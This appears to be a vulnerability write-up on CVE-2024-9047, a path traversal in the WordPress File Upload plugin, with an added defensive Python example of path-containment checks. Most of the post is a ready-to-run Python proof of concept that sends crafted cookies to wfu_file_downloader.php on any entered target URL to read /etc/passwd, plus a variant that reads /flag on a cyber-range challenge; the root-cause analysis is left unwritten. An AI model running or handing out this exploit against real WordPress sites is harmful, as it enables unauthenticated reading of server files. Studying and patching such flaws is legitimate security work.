
CVE-2024-9047


Vulnerability description

The WordPress File Upload plugin has a path traversal vulnerability in the file wfu_file_downloader.php. It allows an unauthenticated attacker to read or delete files outside the directory the download handler was meant to serve. Successful exploitation requires the target WordPress installation to be running PHP 7.4 or earlier.

Affected versions

WordPress File Upload <= 4.24.11
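Since the root-cause section of this post is still pending, the following is an added illustration of the bug class behind this CVE (a download handler that builds a file path from a request-controlled string and never checks that the result stays under its base directory). It is written in Python for convenience and is not the wp-file-upload plugin's code; the upload root and the request values are assumed and constructed for the demo. The first requested path is the value the PoC below sends in its wfu_storage_dr0se cookie.

```python
"""Containment check for a user-controlled download path.

Added illustration of the bug class behind CVE-2024-9047 (path traversal in a
file-download handler). It is NOT the wp-file-upload plugin's code; the upload
root and the request values are assumed/constructed for the demo.
"""
import posixpath
from typing import Optional

# Assumed upload root; a real handler must take this from server-side
# configuration, never from a cookie or parameter.
UPLOAD_BASE = "/var/www/html/wp-content/uploads"

# Constructed request values: the PoC's wfu_storage_* cookie value, a
# legitimate relative path, and a sibling-directory prefix-collision case.
REQUESTED_PATHS = [
    "/../../../../../etc/passwd",
    "2024/07/report.pdf",
    "../uploads2/secret.txt",
]


def naive_resolve(base: str, user_path: str) -> str:
    """Vulnerable pattern: glue the user string onto the base and normalise.

    normpath happily walks '..' components above `base`, so the caller ends up
    reading (or unlinking) whatever file the attacker named.
    """
    return posixpath.normpath(base + "/" + user_path)


def contained_resolve(base: str, user_path: str) -> Optional[str]:
    """Hardened pattern: same construction, then refuse anything outside `base`.

    Returns the resolved path, or None when the request escapes the base.
    """
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(base + "/" + user_path)
    # commonpath, not str.startswith: a plain prefix test would accept
    # ".../uploads2/x" as being inside ".../uploads".
    if posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


def classify(base: str, user_path: str) -> dict:
    """Compare both resolvers on one input (used by the demo and the checks)."""
    resolved = naive_resolve(base, user_path)
    return {
        "naive": resolved,
        "naive_prefix_check_passes": resolved.startswith(base),
        "contained": contained_resolve(base, user_path),
    }


if __name__ == "__main__":
    for requested in REQUESTED_PATHS:
        print(f"{requested!r}: {classify(UPLOAD_BASE, requested)}")
```

Two caveats for real code: normpath is purely lexical, so a production check should resolve the candidate with realpath (or PHP's realpath()) before the commonpath comparison to account for symlinks; and a containment check is only meaningful when the base is fixed server-side. The PoC below also sends a wfu_ABSPATH=/ cookie, and any check against a base that the request itself can set to / is no check at all.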

Here is the PoC used for exploitation:

```python
import time
from urllib.parse import urljoin

import requests
import urllib3

# verify=False below would otherwise emit an InsecureRequestWarning on every request
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def fileuploadcheck(url):
    # Unix timestamp used as the value of the wfu_download_ticket_dr0se cookie
    timestamp = str(int(time.time()))
    # Vulnerable handler; "dr0se" is an arbitrary tag shared by the file=, wfu_cookie=
    # and ticket= parameters and the matching *_dr0se cookies
    target_url = urljoin(url, "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php?"
                              "file=dr0se"
                              "&dboption_base=cookies"
                              "&handler=dboption"
                              "&session_legacy=1"
                              "&dboption_useold=1"
                              "&wfu_cookie=wp_wpfileupload_dr0se"
                              "&ticket=dr0se")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
        # wfu_storage_dr0se carries the path-traversal payload; wfu_ABSPATH is set to /
        "Cookie": "wp_wpfileupload_dr0se=1;"
                  " wfu_storage_dr0se=/../../../../../etc/passwd;"
                  f" wfu_download_ticket_dr0se={timestamp};"
                  " wfu_ABSPATH=/;",
    }

    try:
        response = requests.get(target_url, verify=False, headers=headers, timeout=10)
        # On a vulnerable target the body is the contents of /etc/passwd
        print(response.text)
    except Exception as e:
        print(f"Error while checking {url}: {e}")


if __name__ == "__main__":
    url = input("Target URL (e.g. http://target/): ").strip()
    fileuploadcheck(url)
```

Take a challenge from the Chunqiu Yunjing (春秋云境) cyber range as an example:


The result is as follows: arbitrary file read was achieved.

Root cause analysis (to be added later)

```python
# Same PoC as above, adapted to the range challenge: the only change is the traversal
# target in the wfu_storage_dr0se cookie, /etc/passwd -> /flag
import time
from urllib.parse import urljoin

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def fileuploadcheck(url):
    timestamp = str(int(time.time()))
    target_url = urljoin(url, "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php?"
                              "file=dr0se"
                              "&dboption_base=cookies"
                              "&handler=dboption"
                              "&session_legacy=1"
                              "&dboption_useold=1"
                              "&wfu_cookie=wp_wpfileupload_dr0se"
                              "&ticket=dr0se")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
        # Traversal target changed to the challenge's flag file
        "Cookie": "wp_wpfileupload_dr0se=1;"
                  " wfu_storage_dr0se=/../../../../../flag;"
                  f" wfu_download_ticket_dr0se={timestamp};"
                  " wfu_ABSPATH=/;",
    }

    try:
        response = requests.get(target_url, verify=False, headers=headers, timeout=10)
        print(response.text)
    except Exception as e:
        print(f"Error while checking {url}: {e}")


if __name__ == "__main__":
    url = input("Target URL (e.g. http://target/): ").strip()
    fileuploadcheck(url)
```